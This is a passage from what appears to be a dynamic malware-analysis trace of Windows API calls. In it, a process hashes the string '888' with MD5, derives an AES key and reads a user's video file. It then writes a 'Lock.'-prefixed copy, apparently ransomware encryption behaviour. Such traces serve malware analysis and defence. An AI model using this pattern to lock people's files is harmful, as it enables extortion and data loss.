lpsz="SSA4F00A00447") returned 0xd [0213.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0213.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6e80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0213.659] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7caa0) returned 1 [0213.661] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.661] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.661] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab680, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0213.662] CryptCreateHash (in: hProv=0xa7caa0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.662] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.662] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.662] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab5a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0213.662] CryptHashData (hHash=0x9e2078, pbData=0x2a71bf8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0213.662] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.662] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.662] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.662] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0213.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab4e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0213.663] CryptDeriveKey (in: hProv=0xa7caa0, Algid=0x6601, hBaseData=0x9e2078, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e21f8) returned 1 [0213.663] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.663] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.663] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0213.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0213.663] CryptDestroyHash (hHash=0x9e2078) returned 1 [0213.663] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/qt2pH0rRBDAlo9_9_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\qt2ph0rrbdalo9_9_.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0213.664] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0213.664] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0213.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0213.664] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74cc0 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0213.665] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos/" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74cc0 | out: hHeap=0x2af0000) returned 1 [0213.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0213.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0213.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0213.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0213.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos/Lock.qt2pH0rRBDAlo9_9_.avi" (normalized: "c:\\users\\fd1hvy\\videos\\lock.qt2ph0rrbdalo9_9_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0213.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0213.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0213.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0213.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0213.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ec020 [0213.672] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0213.672] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0213.675] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x2697, lpOverlapped=0x0) returned 1 [0213.675] ReadFile (in: hFile=0x468, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0213.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0213.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0213.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12697) returned 0x2a8a138 [0213.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ec020 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0213.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0213.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12697) returned 0x2aae878 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12697) returned 0x2a8a138 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0213.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0213.681] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0213.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0213.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0213.682] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0213.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: 